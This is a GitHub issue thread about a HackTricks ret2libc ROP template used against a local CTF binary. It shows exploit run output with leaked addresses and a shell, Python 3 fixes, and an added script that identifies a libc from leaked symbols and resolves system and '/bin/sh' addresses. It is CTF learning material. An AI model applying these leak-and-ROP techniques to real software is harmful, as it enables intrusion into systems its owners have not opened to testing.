Comments (7)
Hi @wafflesx90,
The goal of using https://LIBC.blukat.me/ is to identify the libc used by the vulnerable binary.
As not all the libc functions are going to be loaded inside the GOT of the binary (only the ones used), I would recommend you take a look at the binary and, using the template, exfiltrate the address of more than one libc function used by your binary.
Then, put all the leaked addresses into the website to find which libc is used.
from hacktricks.
Hi @wafflesx90!
I have updated that script and put OFFSET as a bytes type object, could you test it now?
from hacktricks.
Greetings,
Thank you for the quick reply. Also, I have tested your updated template in the same environment with the following results.
$ python3 ROP-PWN-template.py
[+] Starting local process './vuln': pid 4816
[*] '/home/palmistry/CTF/vuln'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
[*] Loaded 14 cached gadgets for './vuln'
[*] Main start: 0x401156
[*] Puts plt: 0x401054
[*] pop rdi; ret gadget: 0x4011f3
[*] puts GOT @ 0x404018
b'Simple ROP.\n'
Traceback (most recent call last):
  File "ROP-PWN-template.py", line 90, in <module>
    get_addr("puts") #Search for puts address in memmory to obtains libc base
  File "ROP-PWN-template.py", line 81, in get_addr
    leak = u64(recieved.ljust(8, "\x00"))
TypeError: ljust() argument 2 must be a byte string of length 1, not str
from hacktricks.
After reading those errors I'm starting to think that this template was for Python 2 and not for Python 3.
Anyway, I have fixed that one as well, let me know if it works now.
from hacktricks.
Hi mate,
I have used this template for a CTF challenge and I have improved it.
Test it and let me know if it works for you.
from hacktricks.
Cheers,
I was able to successfully execute the updated template and drop into a shell. I really appreciate you taking time to update the script to python3 capability.
Also, I realize this is outside the scope of the original ticket and not related to your script, but I was hoping you could briefly enlighten me on the query fields to leak libc on https://libc.blukat.me
On the website I filled the first query field with 'puts' and applied the following inside the field
[*] Leaked LIBC address, puts: 0x7f7f1a6165a0
but on your Hack Trick series I see you have a field '__libc_start_main' filled out too.
I had the following data before applying a version of libc, and no matter what information I filled into the '__libc_start_main' field it would return an error. The only field that returned several versions of libc was [*] Leaked LIBC address, puts: 0x7f7f1a6165a0, not '__libc_start_main'.
[*] Loaded 14 cached gadgets for './vuln'
[*] Main start: 0x401156
[*] Puts plt: 0x401054
[*] pop rdi; ret gadget: 0x4011f3
[*] ret gadget: 0x40101a
[*] puts GOT @ 0x404018
[*] Payload aligned successfully
b'Simple ROP.\n'
[*] Len rop1: 80
[*] Leaked LIBC address, puts: 0x7f7f1a6165a0
TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)
[*] Switching to interactive mode
Simple ROP.
$ ls
[*] Got EOF while reading in interactive
If this question is outside the scope of the issue or you don't have an explanation, please consider the original issue resolved; I am happy to close the ticket.
Thanks again!
from hacktricks.
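As an added example (not the template's code, nor anything from the HackTricks repository), the following script shows both points raised in this thread: the first comment's advice to leak more than one libc function before querying https://LIBC.blukat.me/, and the question above about why a single puts leak returns several libc versions while a second symbol such as __libc_start_main narrows the result. It also shows the Python 3 fix for the TypeError in the traceback: the pad passed to ljust must be b"\x00", not "\x00". The candidate libc table and its symbol offsets are constructed and hypothetical (they are not real glibc builds); the puts leak 0x7f7f1a6165a0 is the one from the thread, and the __libc_start_main leak is constructed to match one of the candidates. The matching logic is the same test a libc database applies: libc is mapped page-aligned, so only the low 12 bits of each leaked address carry information about the symbol's offset, and every leaked symbol must yield the same page-aligned base.

```python
import struct

PAGE_MASK = 0xFFF  # libc is mapped page-aligned: base & 0xfff == 0, so leak & 0xfff == offset & 0xfff

# Constructed candidate table: hypothetical libc builds and symbol offsets,
# NOT real glibc values. A libc database such as libc.blukat.me keeps the
# same kind of table for real builds and applies the same low-12-bit test.
CANDIDATES = {
    "libc-A (hypothetical)": {
        "puts": 0x0705A0, "__libc_start_main": 0x021AB0,
        "system": 0x04C2E0, "str_bin_sh": 0x18A1C5,
    },
    "libc-B (hypothetical)": {
        "puts": 0x0725A0, "__libc_start_main": 0x021AC0,
        "system": 0x04D3F0, "str_bin_sh": 0x18B1F2,
    },
    "libc-C (hypothetical)": {
        "puts": 0x069350, "__libc_start_main": 0x020F80,
        "system": 0x048E10, "str_bin_sh": 0x17A4B0,
    },
}


def parse_leak(raw: bytes) -> int:
    """Turn the bytes puts() printed for a GOT entry into an integer.

    puts stops at the first NUL byte, so a 64-bit userland pointer arrives as
    6 little-endian bytes followed by the newline puts appends. Python 3 needs
    a bytes pad (b"\\x00"); padding with the str "\\x00" raises exactly the
    TypeError shown in the thread.
    """
    raw = raw.rstrip(b"\n")
    if not 1 <= len(raw) <= 8:
        raise ValueError(f"unexpected leak length {len(raw)}: {raw!r}")
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


def identify_libc(leaks, candidates=CANDIDATES):
    """Return {libc_name: base} for every candidate consistent with ALL leaks.

    For each symbol the implied base is leak - offset; a match needs the same
    page-aligned base from every leaked symbol. With one leak only its low 12
    bits constrain the answer, which is why a single puts leak returns several
    libcs and a second symbol is needed to disambiguate.
    """
    matches = {}
    for name, offsets in candidates.items():
        bases = set()
        for sym, addr in leaks.items():
            if sym not in offsets:
                break
            base = addr - offsets[sym]
            if base & PAGE_MASK:
                break
            bases.add(base)
        else:
            if len(bases) == 1:
                matches[name] = bases.pop()
    return matches


def resolve_targets(base, offsets):
    """Addresses the second-stage ROP chain needs once the libc is known."""
    return {
        "system": base + offsets["system"],
        "binsh": base + offsets["str_bin_sh"],
    }


if __name__ == "__main__":
    # Constructed leak output: the thread's puts leak 0x7f7f1a6165a0 as puts()
    # would print it, plus a __libc_start_main leak chosen to match libc-A.
    puts_raw = b"\xa0\x65\x61\x1a\x7f\x7f\n"
    lsm_raw = b"\xb0\x7a\x5c\x1a\x7f\x7f\n"
    puts_leak = parse_leak(puts_raw)
    print(f"puts leak: {puts_leak:#x}  (low 12 bits {puts_leak & PAGE_MASK:#05x})")
    only_puts = identify_libc({"puts": puts_leak})
    print("puts only         ->", {k: hex(v) for k, v in only_puts.items()})
    both = identify_libc({"puts": puts_leak, "__libc_start_main": parse_leak(lsm_raw)})
    print("puts + start_main ->", {k: hex(v) for k, v in both.items()})
    for name, base in both.items():
        print(name, {k: hex(v) for k, v in resolve_targets(base, CANDIDATES[name]).items()})
```

Run stand-alone it prints two candidates for the puts leak alone and a single one once __libc_start_main is added, then the system and "/bin/sh" addresses for that base. The same reasoning applies to the website: the value you type into each field is the full leaked address, and the server compares only its low 12 bits against every build it knows, so each extra field you can fill with a real leak removes candidates.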
I really appreciate you moving the issue to resolved over the weekend and getting back to me on my questions. You have a great deal of knowledge and I hope to see more from you in the very near future!
Cheers,
from hacktricks.